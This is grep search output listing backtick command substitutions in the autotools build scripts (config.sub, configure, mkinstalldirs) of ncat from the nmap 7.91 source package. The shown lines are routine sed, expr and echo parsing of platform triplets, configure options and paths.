nmap-7.91+dfsg1/ncat/config.sub:116:maybe_os=`echo $1 | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\2/'`
nmap-7.91+dfsg1/ncat/config.sub-117-case $maybe_os in
##############################################
nmap-7.91+dfsg1/ncat/config.sub-123-    os=-$maybe_os
nmap-7.91+dfsg1/ncat/config.sub:124:    basic_machine=`echo $1 | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\1/'`
nmap-7.91+dfsg1/ncat/config.sub-125-    ;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-127-    os=-linux-android
nmap-7.91+dfsg1/ncat/config.sub:128:    basic_machine=`echo $1 | sed 's/^\(.*\)-\([^-]*-[^-]*\)$/\1/'`-unknown
nmap-7.91+dfsg1/ncat/config.sub-129-    ;;
nmap-7.91+dfsg1/ncat/config.sub-130-  *)
nmap-7.91+dfsg1/ncat/config.sub:131:    basic_machine=`echo $1 | sed 's/-[^-]*$//'`
nmap-7.91+dfsg1/ncat/config.sub-132-    if [ $basic_machine != $1 ]
nmap-7.91+dfsg1/ncat/config.sub:133:    then os=`echo $1 | sed 's/.*-/-/'`
nmap-7.91+dfsg1/ncat/config.sub-134-    else os=; fi
##############################################
nmap-7.91+dfsg1/ncat/config.sub-181-		os=-sco5v6
nmap-7.91+dfsg1/ncat/config.sub:182:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/ncat/config.sub-183-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-185-		os=-sco3.2v5
nmap-7.91+dfsg1/ncat/config.sub:186:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/ncat/config.sub-187-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-189-		os=-sco3.2v4
nmap-7.91+dfsg1/ncat/config.sub:190:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/ncat/config.sub-191-		;;
nmap-7.91+dfsg1/ncat/config.sub-192-	-sco3.2.[4-9]*)
nmap-7.91+dfsg1/ncat/config.sub:193:		os=`echo $os | sed -e 's/sco3.2./sco3.2v/'`
nmap-7.91+dfsg1/ncat/config.sub:194:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/ncat/config.sub-195-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-197-		# Don't forget version if it is 3.2v4 or newer.
nmap-7.91+dfsg1/ncat/config.sub:198:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/ncat/config.sub-199-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-201-		# Don't forget version if it is 3.2v4 or newer.
nmap-7.91+dfsg1/ncat/config.sub:202:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/ncat/config.sub-203-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-205-		os=-sco3.2v2
nmap-7.91+dfsg1/ncat/config.sub:206:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/ncat/config.sub-207-		;;
nmap-7.91+dfsg1/ncat/config.sub-208-	-udk*)
nmap-7.91+dfsg1/ncat/config.sub:209:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/ncat/config.sub-210-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-212-		os=-isc2.2
nmap-7.91+dfsg1/ncat/config.sub:213:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/ncat/config.sub-214-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-218-	-isc*)
nmap-7.91+dfsg1/ncat/config.sub:219:		basic_machine=`echo $1 | sed -e 's/86-.*/86-pc/'`
nmap-7.91+dfsg1/ncat/config.sub-220-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-230-	-ptx*)
nmap-7.91+dfsg1/ncat/config.sub:231:		basic_machine=`echo $1 | sed -e 's/86-.*/86-sequent/'`
nmap-7.91+dfsg1/ncat/config.sub-232-		;;
nmap-7.91+dfsg1/ncat/config.sub-233-	-windowsnt*)
nmap-7.91+dfsg1/ncat/config.sub:234:		os=`echo $os | sed -e 's/windowsnt/winnt/'`
nmap-7.91+dfsg1/ncat/config.sub-235-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-366-	*-*-*)
nmap-7.91+dfsg1/ncat/config.sub:367:		echo Invalid configuration \`$1\': machine \`$basic_machine\' not recognized 1>&2
nmap-7.91+dfsg1/ncat/config.sub-368-		exit 1
##############################################
nmap-7.91+dfsg1/ncat/config.sub-491-	amd64-*)
nmap-7.91+dfsg1/ncat/config.sub:492:		basic_machine=x86_64-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-493-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-533-	blackfin-*)
nmap-7.91+dfsg1/ncat/config.sub:534:		basic_machine=bfin-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-535-		os=-linux
##############################################
nmap-7.91+dfsg1/ncat/config.sub-541-	c54x-*)
nmap-7.91+dfsg1/ncat/config.sub:542:		basic_machine=tic54x-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-543-		;;
nmap-7.91+dfsg1/ncat/config.sub-544-	c55x-*)
nmap-7.91+dfsg1/ncat/config.sub:545:		basic_machine=tic55x-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-546-		;;
nmap-7.91+dfsg1/ncat/config.sub-547-	c6x-*)
nmap-7.91+dfsg1/ncat/config.sub:548:		basic_machine=tic6x-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-549-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-744-	i*86v32)
nmap-7.91+dfsg1/ncat/config.sub:745:		basic_machine=`echo $1 | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/ncat/config.sub-746-		os=-sysv32
##############################################
nmap-7.91+dfsg1/ncat/config.sub-748-	i*86v4*)
nmap-7.91+dfsg1/ncat/config.sub:749:		basic_machine=`echo $1 | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/ncat/config.sub-750-		os=-sysv4
##############################################
nmap-7.91+dfsg1/ncat/config.sub-752-	i*86v)
nmap-7.91+dfsg1/ncat/config.sub:753:		basic_machine=`echo $1 | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/ncat/config.sub-754-		os=-sysv
##############################################
nmap-7.91+dfsg1/ncat/config.sub-756-	i*86sol2)
nmap-7.91+dfsg1/ncat/config.sub:757:		basic_machine=`echo $1 | sed -e 's/86.*/86-pc/'`
nmap-7.91+dfsg1/ncat/config.sub-758-		os=-solaris2
##############################################
nmap-7.91+dfsg1/ncat/config.sub-782-	leon-*|leon[3-9]-*)
nmap-7.91+dfsg1/ncat/config.sub:783:		basic_machine=sparc-`echo $basic_machine | sed 's/-.*//'`
nmap-7.91+dfsg1/ncat/config.sub-784-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-789-	m68knommu-*)
nmap-7.91+dfsg1/ncat/config.sub:790:		basic_machine=m68k-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-791-		os=-linux
##############################################
nmap-7.91+dfsg1/ncat/config.sub-826-	mips3*-*)
nmap-7.91+dfsg1/ncat/config.sub:827:		basic_machine=`echo $basic_machine | sed -e 's/mips3/mips64/'`
nmap-7.91+dfsg1/ncat/config.sub-828-		;;
nmap-7.91+dfsg1/ncat/config.sub-829-	mips3*)
nmap-7.91+dfsg1/ncat/config.sub:830:		basic_machine=`echo $basic_machine | sed -e 's/mips3/mips64/'`-unknown
nmap-7.91+dfsg1/ncat/config.sub-831-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-848-	ms1-*)
nmap-7.91+dfsg1/ncat/config.sub:849:		basic_machine=`echo $basic_machine | sed -e 's/ms1-/mt-/'`
nmap-7.91+dfsg1/ncat/config.sub-850-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-967-	parisc-*)
nmap-7.91+dfsg1/ncat/config.sub:968:		basic_machine=hppa-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-969-		os=-linux
##############################################
nmap-7.91+dfsg1/ncat/config.sub-983-	pc98-*)
nmap-7.91+dfsg1/ncat/config.sub:984:		basic_machine=i386-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-985-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-998-	pentium-* | p5-* | k5-* | k6-* | nexgen-* | viac3-*)
nmap-7.91+dfsg1/ncat/config.sub:999:		basic_machine=i586-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-1000-		;;
nmap-7.91+dfsg1/ncat/config.sub-1001-	pentiumpro-* | p6-* | 6x86-* | athlon-*)
nmap-7.91+dfsg1/ncat/config.sub:1002:		basic_machine=i686-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-1003-		;;
nmap-7.91+dfsg1/ncat/config.sub-1004-	pentiumii-* | pentium2-* | pentiumiii-* | pentium3-*)
nmap-7.91+dfsg1/ncat/config.sub:1005:		basic_machine=i686-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-1006-		;;
nmap-7.91+dfsg1/ncat/config.sub-1007-	pentium4-*)
nmap-7.91+dfsg1/ncat/config.sub:1008:		basic_machine=i786-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-1009-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1017-	ppc-* | ppcbe-*)
nmap-7.91+dfsg1/ncat/config.sub:1018:		basic_machine=powerpc-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-1019-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1023-	ppcle-* | powerpclittle-*)
nmap-7.91+dfsg1/ncat/config.sub:1024:		basic_machine=powerpcle-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-1025-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1027-		;;
nmap-7.91+dfsg1/ncat/config.sub:1028:	ppc64-*) basic_machine=powerpc64-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-1029-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1033-	ppc64le-* | powerpc64little-*)
nmap-7.91+dfsg1/ncat/config.sub:1034:		basic_machine=powerpc64le-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-1035-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1116-	strongarm-* | thumb-*)
nmap-7.91+dfsg1/ncat/config.sub:1117:		basic_machine=arm-`echo $basic_machine | sed 's/^[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub-1118-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1246-	xscale-* | xscalee[bl]-*)
nmap-7.91+dfsg1/ncat/config.sub:1247:		basic_machine=`echo $basic_machine | sed 's/^xscale/arm/'`
nmap-7.91+dfsg1/ncat/config.sub-1248-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1323-	*)
nmap-7.91+dfsg1/ncat/config.sub:1324:		echo Invalid configuration \`$1\': machine \`$basic_machine\' not recognized 1>&2
nmap-7.91+dfsg1/ncat/config.sub-1325-		exit 1
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1331-	*-digital*)
nmap-7.91+dfsg1/ncat/config.sub:1332:		basic_machine=`echo $basic_machine | sed 's/digital.*/dec/'`
nmap-7.91+dfsg1/ncat/config.sub-1333-		;;
nmap-7.91+dfsg1/ncat/config.sub-1334-	*-commodore*)
nmap-7.91+dfsg1/ncat/config.sub:1335:		basic_machine=`echo $basic_machine | sed 's/commodore.*/cbm/'`
nmap-7.91+dfsg1/ncat/config.sub-1336-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1352-	-solaris1 | -solaris1.*)
nmap-7.91+dfsg1/ncat/config.sub:1353:		os=`echo $os | sed -e 's|solaris1|sunos4|'`
nmap-7.91+dfsg1/ncat/config.sub-1354-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1364-	-gnu/linux*)
nmap-7.91+dfsg1/ncat/config.sub:1365:		os=`echo $os | sed -e 's|gnu/linux|linux-gnu|'`
nmap-7.91+dfsg1/ncat/config.sub-1366-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1410-	-nto*)
nmap-7.91+dfsg1/ncat/config.sub:1411:		os=`echo $os | sed -e 's|nto|nto-qnx|'`
nmap-7.91+dfsg1/ncat/config.sub-1412-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1417-	-mac*)
nmap-7.91+dfsg1/ncat/config.sub:1418:		os=`echo $os | sed -e 's|mac|macos|'`
nmap-7.91+dfsg1/ncat/config.sub-1419-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1423-	-linux*)
nmap-7.91+dfsg1/ncat/config.sub:1424:		os=`echo $os | sed -e 's|linux|linux-gnu|'`
nmap-7.91+dfsg1/ncat/config.sub-1425-		;;
nmap-7.91+dfsg1/ncat/config.sub-1426-	-sunos5*)
nmap-7.91+dfsg1/ncat/config.sub:1427:		os=`echo $os | sed -e 's|sunos5|solaris2|'`
nmap-7.91+dfsg1/ncat/config.sub-1428-		;;
nmap-7.91+dfsg1/ncat/config.sub-1429-	-sunos6*)
nmap-7.91+dfsg1/ncat/config.sub:1430:		os=`echo $os | sed -e 's|sunos6|solaris3|'`
nmap-7.91+dfsg1/ncat/config.sub-1431-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1478-	-sinix5.*)
nmap-7.91+dfsg1/ncat/config.sub:1479:		os=`echo $os | sed -e 's|sinix|sysv|'`
nmap-7.91+dfsg1/ncat/config.sub-1480-		;;
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1531-		# Get rid of the `-' at the beginning of $os.
nmap-7.91+dfsg1/ncat/config.sub:1532:		os=`echo $os | sed 's/[^-]*-//'`
nmap-7.91+dfsg1/ncat/config.sub:1533:		echo Invalid configuration \`$1\': system \`$os\' not recognized 1>&2
nmap-7.91+dfsg1/ncat/config.sub-1534-		exit 1
##############################################
nmap-7.91+dfsg1/ncat/config.sub-1794-		esac
nmap-7.91+dfsg1/ncat/config.sub:1795:		basic_machine=`echo $basic_machine | sed "s/unknown/$vendor/"`
nmap-7.91+dfsg1/ncat/config.sub-1796-		;;
##############################################
nmap-7.91+dfsg1/ncat/mkinstalldirs-12-do
nmap-7.91+dfsg1/ncat/mkinstalldirs:13:   set fnord `echo ":$file" | sed -ne 's/^:\//#/;s/^://;s/\// /g;s/^#/\//;p'`
nmap-7.91+dfsg1/ncat/mkinstalldirs-14-   shift
##############################################
nmap-7.91+dfsg1/ncat/configure-43-if test -z "$BASH_VERSION$ZSH_VERSION" \
nmap-7.91+dfsg1/ncat/configure:44:    && (test "X`print -r -- $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/ncat/configure-45-  as_echo='print -r --'
nmap-7.91+dfsg1/ncat/configure-46-  as_echo_n='print -rn --'
nmap-7.91+dfsg1/ncat/configure:47:elif (test "X`printf %s $as_echo`" = "X$as_echo") 2>/dev/null; then
nmap-7.91+dfsg1/ncat/configure-48-  as_echo='printf %s\n'
##############################################
nmap-7.91+dfsg1/ncat/configure-50-else
nmap-7.91+dfsg1/ncat/configure:51:  if test "X`(/usr/ucb/echo -n -n $as_echo) 2>/dev/null`" = "X-n $as_echo"; then
nmap-7.91+dfsg1/ncat/configure-52-    as_echo_body='eval /usr/ucb/echo -n "$1$as_nl"'
##############################################
nmap-7.91+dfsg1/ncat/configure-60-	expr "X$arg" : "X\\(.*\\)$as_nl";
nmap-7.91+dfsg1/ncat/configure:61:	arg=`expr "X$arg" : ".*$as_nl\\(.*\\)"`;;
nmap-7.91+dfsg1/ncat/configure-62-      esac;
##############################################
nmap-7.91+dfsg1/ncat/configure-197-  eval 'test \"x\$as_lineno_1'\$as_run'\" != \"x\$as_lineno_2'\$as_run'\" &&
nmap-7.91+dfsg1/ncat/configure:198:  test \"x\`expr \$as_lineno_1'\$as_run' + 1\`\" = \"x\$as_lineno_2'\$as_run'\"' || exit 1
nmap-7.91+dfsg1/ncat/configure-199-test \$(( 1 + 1 )) = 2 || exit 1"
##############################################
nmap-7.91+dfsg1/ncat/configure-324-      case $as_dir in #(
nmap-7.91+dfsg1/ncat/configure:325:      *\'*) as_qdir=`$as_echo "$as_dir" | sed "s/'/'\\\\\\\\''/g"`;; #'(
nmap-7.91+dfsg1/ncat/configure-326-      *) as_qdir=$as_dir;;
##############################################
nmap-7.91+dfsg1/ncat/configure-397-  {
nmap-7.91+dfsg1/ncat/configure:398:    as_val=`expr "$@" || test $? -eq 1`
nmap-7.91+dfsg1/ncat/configure-399-  }
##############################################
nmap-7.91+dfsg1/ncat/configure-404-# ----------------------------------------
nmap-7.91+dfsg1/ncat/configure:405:# Output "`basename $0`: error: ERROR" to stderr. If LINENO and LOG_FD are
nmap-7.91+dfsg1/ncat/configure-406-# provided, also output the error to LOG_FD, referencing LINENO. Then exit the
##############################################
nmap-7.91+dfsg1/ncat/configure-467-  eval 'test "x$as_lineno_1'$as_run'" != "x$as_lineno_2'$as_run'" &&
nmap-7.91+dfsg1/ncat/configure:468:  test "x`expr $as_lineno_1'$as_run' + 1`" = "x$as_lineno_2'$as_run'"' || {
nmap-7.91+dfsg1/ncat/configure-469-  # Blame Lee E. McMahon (1931-1989) for sed's syntax.  :-)
##############################################
nmap-7.91+dfsg1/ncat/configure-779-  case $ac_option in
nmap-7.91+dfsg1/ncat/configure:780:  *=?*) ac_optarg=`expr "X$ac_option" : '[^=]*=\(.*\)'` ;;
nmap-7.91+dfsg1/ncat/configure-781-  *=)   ac_optarg= ;;
##############################################
nmap-7.91+dfsg1/ncat/configure-823-  -disable-* | --disable-*)
nmap-7.91+dfsg1/ncat/configure:824:    ac_useropt=`expr "x$ac_option" : 'x-*disable-\(.*\)'`
nmap-7.91+dfsg1/ncat/configure-825-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/ncat/configure-828-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/ncat/configure:829:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/ncat/configure-830-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/ncat/configure-849-  -enable-* | --enable-*)
nmap-7.91+dfsg1/ncat/configure:850:    ac_useropt=`expr "x$ac_option" : 'x-*enable-\([^=]*\)'`
nmap-7.91+dfsg1/ncat/configure-851-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/ncat/configure-854-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/ncat/configure:855:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/ncat/configure-856-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/ncat/configure-1062-  -with-* | --with-*)
nmap-7.91+dfsg1/ncat/configure:1063:    ac_useropt=`expr "x$ac_option" : 'x-*with-\([^=]*\)'`
nmap-7.91+dfsg1/ncat/configure-1064-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/ncat/configure-1067-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/ncat/configure:1068:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/ncat/configure-1069-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/ncat/configure-1078-  -without-* | --without-*)
nmap-7.91+dfsg1/ncat/configure:1079:    ac_useropt=`expr "x$ac_option" : 'x-*without-\(.*\)'`
nmap-7.91+dfsg1/ncat/configure-1080-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/ncat/configure-1083-    ac_useropt_orig=$ac_useropt
nmap-7.91+dfsg1/ncat/configure:1084:    ac_useropt=`$as_echo "$ac_useropt" | sed 's/[-+.]/_/g'`
nmap-7.91+dfsg1/ncat/configure-1085-    case $ac_user_opts in
##############################################
nmap-7.91+dfsg1/ncat/configure-1116-  *=*)
nmap-7.91+dfsg1/ncat/configure:1117:    ac_envvar=`expr "x$ac_option" : 'x\([^=]*\)='`
nmap-7.91+dfsg1/ncat/configure-1118-    # Reject names that are not valid shell variable names.
##############################################
nmap-7.91+dfsg1/ncat/configure-1137-if test -n "$ac_prev"; then
nmap-7.91+dfsg1/ncat/configure:1138:  ac_option=--`echo $ac_prev | sed 's/_/-/g'`
nmap-7.91+dfsg1/ncat/configure-1139-  as_fn_error $? "missing argument to $ac_option"
##############################################
nmap-7.91+dfsg1/ncat/configure-1159-    */ )
nmap-7.91+dfsg1/ncat/configure:1160:      ac_val=`expr "X$ac_val" : 'X\(.*[^/]\)' \| "X$ac_val" : 'X\(.*\)'`
nmap-7.91+dfsg1/ncat/configure-1161-      eval $ac_var=\$ac_val;;
##############################################
nmap-7.91+dfsg1/ncat/configure-1194-ac_ls_di=`ls -di .` &&
nmap-7.91+dfsg1/ncat/configure:1195:ac_pwd_ls_di=`cd "$ac_pwd" && ls -di .` ||
nmap-7.91+dfsg1/ncat/configure-1196-  as_fn_error $? "working directory cannot be determined"
##############################################
nmap-7.91+dfsg1/ncat/configure-1250-case $srcdir in
nmap-7.91+dfsg1/ncat/configure:1251:*/) srcdir=`expr "X$srcdir" : 'X\(.*[^/]\)' \| "X$srcdir" : 'X\(.*\)'`;;
nmap-7.91+dfsg1/ncat/configure-1252-esac
##############################################
nmap-7.91+dfsg1/ncat/configure-1293-By default, \`make install' will install all the files in
nmap-7.91+dfsg1/ncat/configure:1294:\`$ac_default_prefix/bin', \`$ac_default_prefix/lib' etc.  You can specify
nmap-7.91+dfsg1/ncat/configure:1295:an installation prefix other than \`$ac_default_prefix' using \`--prefix',
nmap-7.91+dfsg1/ncat/configure-1296-for instance \`--prefix=\$HOME'.
##############################################
nmap-7.91+dfsg1/ncat/configure-1375-*)
nmap-7.91+dfsg1/ncat/configure:1376:  ac_dir_suffix=/`$as_echo "$ac_dir" | sed 's|^\.[\\/]||'`
nmap-7.91+dfsg1/ncat/configure-1377-  # A ".." for each directory in $ac_dir_suffix.
nmap-7.91+dfsg1/ncat/configure:1378:  ac_top_builddir_sub=`$as_echo "$ac_dir_suffix" | sed 's|/[^\\/]*|/..|g;s|/||'`
nmap-7.91+dfsg1/ncat/configure-1379-  case $ac_top_builddir_sub in
##############################################
nmap-7.91+dfsg1/ncat/configure-1845-  as_lineno=${as_lineno-"$1"} as_lineno_stack=as_lineno_stack=$as_lineno_stack
nmap-7.91+dfsg1/ncat/configure:1846:  as_decl_name=`echo $2|sed 's/ *(.*//'`
nmap-7.91+dfsg1/ncat/configure:1847:  as_decl_use=`echo $2|sed -e 's/(/((/' -e 's/)/) 0&/' -e 's/,/) 0& (/g'`
nmap-7.91+dfsg1/ncat/configure-1848-  { $as_echo "$as_me:${as_lineno-$LINENO}: checking whether $as_decl_name is declared" >&5
##############################################
nmap-7.91+dfsg1/ncat/configure-1959-    *\'*)
nmap-7.91+dfsg1/ncat/configure:1960:      ac_arg=`$as_echo "$ac_arg" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/ncat/configure-1961-    esac
##############################################
nmap-7.91+dfsg1/ncat/configure-2042-      case $ac_val in
nmap-7.91+dfsg1/ncat/configure:2043:      *\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;;
nmap-7.91+dfsg1/ncat/configure-2044-      esac
##############################################
nmap-7.91+dfsg1/ncat/configure-2057-	case $ac_val in
nmap-7.91+dfsg1/ncat/configure:2058:	*\'\''*) ac_val=`$as_echo "$ac_val" | sed "s/'\''/'\''\\\\\\\\'\'''\''/g"`;;
nmap-7.91+dfsg1/ncat/configure-2059-	esac
##############################################
nmap-7.91+dfsg1/ncat/configure-2177-    set,)
nmap-7.91+dfsg1/ncat/configure:2178:      { $as_echo "$as_me:${as_lineno-$LINENO}: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&5
nmap-7.91+dfsg1/ncat/configure:2179:$as_echo "$as_me: error: \`$ac_var' was set to \`$ac_old_val' in the previous run" >&2;}
nmap-7.91+dfsg1/ncat/configure-2180-      ac_cache_corrupted=: ;;
##############################################
nmap-7.91+dfsg1/ncat/configure-2188-	# differences in whitespace do not lead to failure.
nmap-7.91+dfsg1/ncat/configure:2189:	ac_old_val_w=`echo x $ac_old_val`
nmap-7.91+dfsg1/ncat/configure:2190:	ac_new_val_w=`echo x $ac_new_val`
nmap-7.91+dfsg1/ncat/configure-2191-	if test "$ac_old_val_w" != "$ac_new_val_w"; then
##############################################
nmap-7.91+dfsg1/ncat/configure-2208-    case $ac_new_val in
nmap-7.91+dfsg1/ncat/configure:2209:    *\'*) ac_arg=$ac_var=`$as_echo "$ac_new_val" | sed "s/'/'\\\\\\\\''/g"` ;;
nmap-7.91+dfsg1/ncat/configure-2210-    *) ac_arg=$ac_var=$ac_new_val ;;
##############################################
nmap-7.91+dfsg1/ncat/configure-2288-test "x$ac_build_alias" = x &&
nmap-7.91+dfsg1/ncat/configure:2289:  ac_build_alias=`$SHELL "$ac_aux_dir/config.guess"`
nmap-7.91+dfsg1/ncat/configure-2290-test "x$ac_build_alias" = x &&
nmap-7.91+dfsg1/ncat/configure-2291-  as_fn_error $? "cannot guess build type; you must specify one" "$LINENO" 5
nmap-7.91+dfsg1/ncat/configure:2292:ac_cv_build=`$SHELL "$ac_aux_dir/config.sub" $ac_build_alias` ||
nmap-7.91+dfsg1/ncat/configure-2293-  as_fn_error $? "$SHELL $ac_aux_dir/config.sub $ac_build_alias failed" "$LINENO" 5
##############################################
nmap-7.91+dfsg1/ncat/configure-2312-IFS=$ac_save_IFS
nmap-7.91+dfsg1/ncat/configure:2313:case $build_os in *\ *) build_os=`echo "$build_os" | sed 's/ /-/g'`;; esac
nmap-7.91+dfsg1/ncat/configure-2314-
##############################################
nmap-7.91+dfsg1/ncat/configure-2323-else
nmap-7.91+dfsg1/ncat/configure:2324:  ac_cv_host=`$SHELL "$ac_aux_dir/config.sub" $host_alias` ||
nmap-7.91+dfsg1/ncat/configure-2325-    as_fn_error $? "$SHELL $ac_aux_dir/config.sub $host_alias failed" "$LINENO" 5
##############################################
nmap-7.91+dfsg1/ncat/configure-2345-IFS=$ac_save_IFS
nmap-7.91+dfsg1/ncat/configure:2346:case $host_os in *\ *) host_os=`echo "$host_os" | sed 's/ /-/g'`;; esac
nmap-7.91+dfsg1/ncat/configure-2347-
##############################################
nmap-7.91+dfsg1/ncat/configure-2717-$as_echo_n "checking whether the C compiler works... " >&6; }
nmap-7.91+dfsg1/ncat/configure:2718:ac_link_default=`$as_echo "$ac_link" | sed 's/ -o *conftest[^ ]*//'`
nmap-7.91+dfsg1/ncat/configure-2719-
##############################################
nmap-7.91+dfsg1/ncat/configure-2761-	then :; else
nmap-7.91+dfsg1/ncat/configure:2762:	   ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'`
nmap-7.91+dfsg1/ncat/configure-2763-	fi
##############################################
nmap-7.91+dfsg1/ncat/configure-2821-    *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM | *.o | *.obj ) ;;
nmap-7.91+dfsg1/ncat/configure:2822:    *.* ) ac_cv_exeext=`expr "$ac_file" : '[^.]*\(\..*\)'`
nmap-7.91+dfsg1/ncat/configure-2823-	  break;;
##############################################
nmap-7.91+dfsg1/ncat/configure-2930-    *.$ac_ext | *.xcoff | *.tds | *.d | *.pdb | *.xSYM | *.bb | *.bbg | *.map | *.inf | *.dSYM ) ;;
nmap-7.91+dfsg1/ncat/configure:2931:    *) ac_cv_objext=`expr "$ac_file" : '.*\.\(.*\)'`
nmap-7.91+dfsg1/ncat/configure-2932-       break;;
##############################################
nmap-7.91+dfsg1/ncat/configure-3515-  # Check for GNU $ac_path_GREP
nmap-7.91+dfsg1/ncat/configure:3516:case `"$ac_path_GREP" --version 2>&1` in
nmap-7.91+dfsg1/ncat/configure-3517-*GNU*)
##############################################
nmap-7.91+dfsg1/ncat/configure-3581-  # Check for GNU $ac_path_EGREP
nmap-7.91+dfsg1/ncat/configure:3582:case `"$ac_path_EGREP" --version 2>&1` in
nmap-7.91+dfsg1/ncat/configure-3583-*GNU*)
##############################################
nmap-7.91+dfsg1/ncat/configure-3783-do :
nmap-7.91+dfsg1/ncat/configure:3784:  as_ac_Header=`$as_echo "ac_cv_header_$ac_header" | $as_tr_sh`
nmap-7.91+dfsg1/ncat/configure-3785-ac_fn_c_check_header_compile "$LINENO" "$ac_header" "$as_ac_Header" "$ac_includes_default
##############################################
nmap-7.91+dfsg1/ncat/configure-3788-  cat >>confdefs.h <<_ACEOF
nmap-7.91+dfsg1/ncat/configure:3789:#define `$as_echo "HAVE_$ac_header" | $as_tr_cpp` 1
nmap-7.91+dfsg1/ncat/configure-3790-_ACEOF
##############################################
nmap-7.91+dfsg1/ncat/configure-3798-do :
